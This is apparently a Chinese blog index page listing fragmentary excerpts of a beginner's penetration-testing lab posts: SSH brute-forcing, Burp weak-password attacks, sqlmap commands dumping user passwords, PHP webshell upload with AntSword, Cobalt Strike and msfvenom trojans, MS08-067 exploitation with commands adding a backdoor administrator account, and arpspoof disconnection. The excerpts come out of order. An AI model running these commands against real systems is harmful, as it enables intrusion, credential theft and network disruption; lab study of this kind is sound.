- 博客(10)
- 收藏
- 关注
RSS订阅原创 kali爆破ssh
netstat -tunlp 含义。5、查看端口状态,确定ssh是否开启。6、查看目标机的ssh是否开启。3、写账号字典和密码字典。
2024-08-06 12:10:32
1129
原创 BurpSuite简单使用:弱口令
在未得到网站授权前提下,禁止对政府、事业单位、企业或其他单位网站及系统进行渗透测试;技术是把双刃剑,请遵纪守法,做一名合格的白帽子安全专家,为国家的网络安全事业做出贡献;1、在火狐浏览器中下载代理扩展:FoxyProxy。首先进入登录界面,然后打开代理和burp。该文章仅用于信息防御技术的交流和学习,经过验证发现,该账号密码确实是正确的。2、使用burp拦截包。
2024-05-21 14:05:29
353
1
原创 sqlmap简单使用
python sqlmap.py -u "需要检测的网址" -D security -T users -C password,username --dump。6、获取security数据库中的表名:python sqlmap.py -u "需要检测的网址" -D security --tables。python sqlmap.py -u "需要检测的网址" -D security -T users --columns。3、python sqlmap.py -u "需要检测的网址"最终获取了账号和密码。
2024-05-21 13:15:23
386
1
原创 dvwa与AntSword与哥斯拉与冰蝎
一、编写一个木马文件eg:One_sentence_Trojan_horse.php(下面需要上传的文件)添加后双击,即可进入对方的文件夹,可以随意操作,多加几个木马文件。二、打开AntSwort,空白处右键,点击添加数据。双击新增的项,连接成功。
2024-03-31 00:20:59
219
1
原创 cs的运用
2、进入 cobaltstrike有修改中文 文件夹 cd cobaltstrike有修改中文。3、对所有文件提升权限,可读可写可执行 chmod 777 *②进入文件夹:cd cobaltstrike有修改中文。1、将 cobaltstrike有修改中文 文件夹拖到虚拟机的桌面。③开启cs:./cs.bat。7、将生成的文件发送到目标主机,目标主机双击。①提权: sudo su。输入 sleep 5。5、打开新的命令界面。
2024-03-20 20:25:53
126
1
原创 msfvenom生成木马
目标机:windows xp ip:192.168.136.138。攻击机:kali ip:192.168.136.131。
2024-03-18 23:32:31
591
1
原创 MS08-067远程代码执行漏洞复现及相关利用
攻击机: ip:192.168.136.131 网关:192.168.136.255。目标机: ip:192.168.136.138 网关:192.168.136.2。3、提权:net localgroup administrators root /add。2、在目标机上创建一个新的用户:net user root 123456 /add。攻击机:kali 目标机:win xp。一、验证双方是否可以互相ping通。
2024-03-14 00:13:20
672
原创 arpspoof断网
攻击机:kali IP : 192.168.136.131 网关:192.168.136.255。目标机:win7 IP : 192.168.136.133 网关:192.168.136.2。测试攻击机是否可以ping通目标机:ping 192.168.136.133。测试攻击机是否联网:ping www.baidu.com。测试目标机是否联网:ping www.baidu.com。问题:知道对方的ip,如何获得对方的网关。
2024-03-13 00:27:04
760
原创 电脑使用快捷键
Ctrl + C :复制选定的内容。Ctrl + X :剪切选定的内容。Ctrl + V :粘贴剪切或复制的内容。Ctrl + Tab :在多个标签页或窗口之间切换。Ctrl + F :在文档或网页中查找关键词。Ctrl + N :新建一个窗口或文档。Ctrl + W :关闭当前窗口或文档。Ctrl + Z :撤销上一步操作。Ctrl + S :保存当前文件。Ctrl + A :选择所有内容。Ctrl + P :打印当前文档。Ctrl + O :打开一个文件。F5:刷新当前页面或窗口。
2023-10-25 22:07:24
265
1
TA创建的收藏夹 TA关注的收藏夹
TA关注的人